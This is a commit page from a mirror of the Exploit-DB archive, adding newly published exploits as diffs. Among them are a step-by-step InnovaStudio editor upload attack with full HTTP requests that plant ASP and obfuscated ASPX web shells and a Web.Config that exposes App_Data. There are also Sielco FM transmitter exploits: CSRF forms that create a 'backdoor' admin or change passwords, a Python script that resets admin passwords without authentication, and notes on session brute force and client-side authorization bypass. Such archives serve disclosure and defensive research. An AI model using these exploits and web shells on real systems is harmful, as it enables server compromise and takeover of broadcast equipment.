bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-15

Browse source 
16 changes to exploits/shellcodes/ghdb

InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal

Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure

Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)

Bludit 4.0.0-rc-2 - Account takeover

Microsoft Windows 11 - 'cmd.exe' Denial of Service
This commit is contained in:
Exploit-DB 2023-04-15 00:16:19 +00:00
parent f65c0558fe
commit 2f07358143
15 changed files with 1562 additions and 39 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

330
exploits/asp/webapps/51362.txt Normal file
View file

@ -0,0 +1,330 @@
# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
# #
# ASP version, in i_upload_object_FSO.asp, line 234 #
# #
# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
# #
##################################################################################################
||==============================================================================||
|| ((((1)))) ||
|| ||
|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
" "
==================================================================================================
***
||================================================================================||
|| ((((2)))) ||
|| ||
|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
|| ||
||================================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" >>> filename="shell.asp%00asp.txt" <<< "
" "
" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
" "
" or "
" "
" CTRL+Shift+U "
" "
" SEND! "
" "
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
" "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
" "
==================================================================================================
***
||==============================================================================||
|| ((((3)))) ||
|| ||
|| ...:::NO WRITE PERMISSION!:::... ||
|| ||
|| ...:::Directory Traversal:::... ||
|| ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0600 ] "
" "
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
" "
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
" "
" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
" "
" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
" "
" "
##################################################################################################
##########################################################################################################################################################
# #
# What is the App_Data Folder useful? #
# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory. #
# Because it's a private directory, the IIS server hides it for security reasons. #
# Now, we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
# So the directory will be public and it will be able to respond to external queries and run a shell. #
# #
##########################################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
<configuration>
<system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
<requestFiltering>
<hiddenSegments>
<clear />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
" "
" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
" "
==================================================================================================
# Now we will upload your shell to the directory where we made ByPass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
" "
" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
" "
==========================================================================================================================================
" "
" So what can we do if no directory on the site has write permission? "
" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability, "
" Sometimes also it can be a "Service Permissions" vulnerability. "
" Sometimes also it can be a "Binary Permissions " vulnerability. "
" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
" Our limits are as much as our imagination... "
" *** 0DAY *** "
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
" And then upload our shell file to the server by bypassing it. "
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
" "
==========================================================================================================================================

74
exploits/hardware/remote/51366.txt Normal file
View file

@ -0,0 +1,74 @@
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php
26.01.2023
-->
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="test" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="2" />
<input type="hidden" name="user3" value="" />
<input type="hidden" name="pwd3" value="" />
<input type="hidden" name="pwd3bis" value="" />
<input type="hidden" name="auth3" value="" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>

59
exploits/hardware/webapps/51363.txt Normal file
View file

@ -0,0 +1,59 @@
## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The Cookie session ID 'id' is of an insufficient length and
can be exploited by brute force, which may allow a remote attacker
to obtain a valid session, bypass authentication and manipulate
the transmitter.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5758
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php
26.01.2023
--
# Session values (len=5)
Cookie: id=44189
Cookie: id=37692
Cookie: id=+6638
Cookie: id=+3077
...
...

80
exploits/hardware/webapps/51364.txt Normal file
View file

@ -0,0 +1,80 @@
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
## Exploit Author: LiquidWorm
Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php
26.01.2023
-->
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="" />
<input type="hidden" name="user3" value="backdoor" />
<input type="hidden" name="pwd3" value="backdoor123" />
<input type="hidden" name="pwd3bis" value="backdoor123" />
<input type="hidden" name="auth3" value="2" />
<input type="submit" value="Adminize!" />
</form>
</body>
</html>

75
exploits/hardware/webapps/51365.txt Normal file
View file

@ -0,0 +1,75 @@
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application suffers from improper access control when
editing users. A user with Read permissions can manipulate users,
passwords and permissions by sending a single HTTP POST request
with modified parameters and edit other users' names, passwords
and permissions including admin password.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5756
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php
26.01.2023
-->
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
<input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
<input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 -->
<input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd -->
<input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd -->
<input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm -->
<input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 -->
<input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd -->
<input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd -->
<input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm -->
<input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 -->
<input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd -->
<input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd -->
<input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users" />
</form>
</body>
</html>

105
exploits/hardware/webapps/51367.py Executable file
View file

@ -0,0 +1,105 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
## Exploit Author: LiquidWorm
#
#
# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#
#
# Vendor: Sielco S.r.l
# Product web page: https://www.sielco.org
# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
# PolyEco1000 CPU:1.9.4 FPGA:10.19
# PolyEco1000 CPU:1.9.3 FPGA:10.19
# PolyEco500 CPU:1.7.0 FPGA:10.16
# PolyEco300 CPU:2.0.2 FPGA:10.19
# PolyEco300 CPU:2.0.0 FPGA:10.19
#
# Summary: PolyEco is the innovative family of high-end digital
# FM transmitters of Sielco. They are especially suited as high
# performance power system exciters or compact low-mid power
# transmitters. The same cabinet may in fact be fitted with 50,
# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
# 1000).
#
# All features can be controlled via the large touch-screen display
# 4.3" or remotely. Many advanced features are inside by default
# in the basic version such as: stereo and RDS encoder, audio
# change-over, remote-control via LAN and SNMP, "FFT" spectral
# analysis of the audio sources, SFN synchronization and much more.
#
# Desc: The application suffers from an authentication bypass and
# account takeover/lockout vulnerability that can be triggered by
# directly calling the users object and effectively modifying the
# password of the two constants user/role (user/admin). This can
# be exploited by an unauthenticated adversary by issuing a single
# POST request to the vulnerable endpoint and gain unauthorized
# access to the affected device with administrative privileges.
#
# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5769
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
#
#
# 26.01.2023
#
#
import requests
print( '''
.- _ _ -.
/ / \\ \\
( ( (` (-o-) `) ) )
\ \_ ` -+- ` _/ /
`- -+- -`
-+-
-+-
-+-
-+-
-+-
-+-
/ \\
*****************************************************
! Sielco PolyEco Authentication Bypass Script !
*****************************************************
Please note that this script is for educational and
ethical purposes only. Using it for unauthorized
access or malicious activities is strictly prohibited
and can have serious legal and ethical consequences.
The responsibility of using this script in a lawful
and ethical manner lies solely with the user. The
author or creator of this script shall not be held
responsible for any unlawful or unethical activities
performed by the users.
''' )
url = input( ' Enter the URL (e.g. http://host:8090): ' )
if not 'http' in url :
url = 'http://{}'.format( url )
user = input( ' Enter the desired role (e.g. user or admin): ')
if user not in [ 'user', 'admin' ] :
exit( ' Only \'user\' or \'admin\' please.' )
password = input( ' Enter the desired password: ' )
end = '/protect/users.htm'
payload = {}
if user == "user" :
payload[ 'pwd_admin' ] = ''
payload[ 'pwd_user' ] = password
elif user == 'admin' :
payload[ 'pwd_admin' ] = password
payload[ 'pwd_user' ] = ''
r = requests.post( url + end, data = payload )
if r.status_code == 200 :
print( '\n MSG: OK.' )
else:
print( '\n MSG: ERROR!' )

88
exploits/hardware/webapps/51368.txt Normal file
View file

@ -0,0 +1,88 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Improper access control occurs when the application provides
direct access to objects based on user-supplied input. As a result
of this vulnerability attackers can bypass authorization and access
resources behind protected pages.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5768
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php
26.01.2023
--
index.htm:
----------
54: function dologin() {
55: var hash = hex_md5($('#password').val() + id);
56: $.get('/login.cgi', {
57: user: $('#user').val(),
58: password: hash,
59: id: id
60: }).done(function (data) {
61: var dati = $.parseXML(data);
62: id = $(dati).find('id').text();
63: user = $(dati).find('u').text();
64: if (id == 0)
65: window.location.href = '/index.htm';
66: else {
67: scriviCookie('polyeco', id, 180);
68: if (user >= 3)
69: window.location.href = '/protect/factory.htm';
70: else
71: window.location.href = '/protect/index.htm';
72: }
73: });
74: }
The function 'dologin()' in index.htm is called when a user submits a login form.
It starts by calculating a hash of the user-entered password and a variable 'id'
using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'
endpoint with the user's entered username, the calculated password hash and the
'id' variable as parameters. If the request is successful, the function parses the
XML data returned from the server, extracting the values of the 'id' and 'u' elements.
Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects
the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the
value of 'id' and expires after 180 days.
After that it checks the value of the 'user' variable, if it's greater than or equal
to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the
user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side
JavaScript to always set the 'user' variable to a high value (4), or by tampering with
the data sent to the server during the login process to change the value of the 'user'
variable. It also works if the server's response variable 'user' is modified.

118
exploits/hardware/webapps/51369.txt Normal file
View file

@ -0,0 +1,118 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
## Exploit Author: LiquidWorm
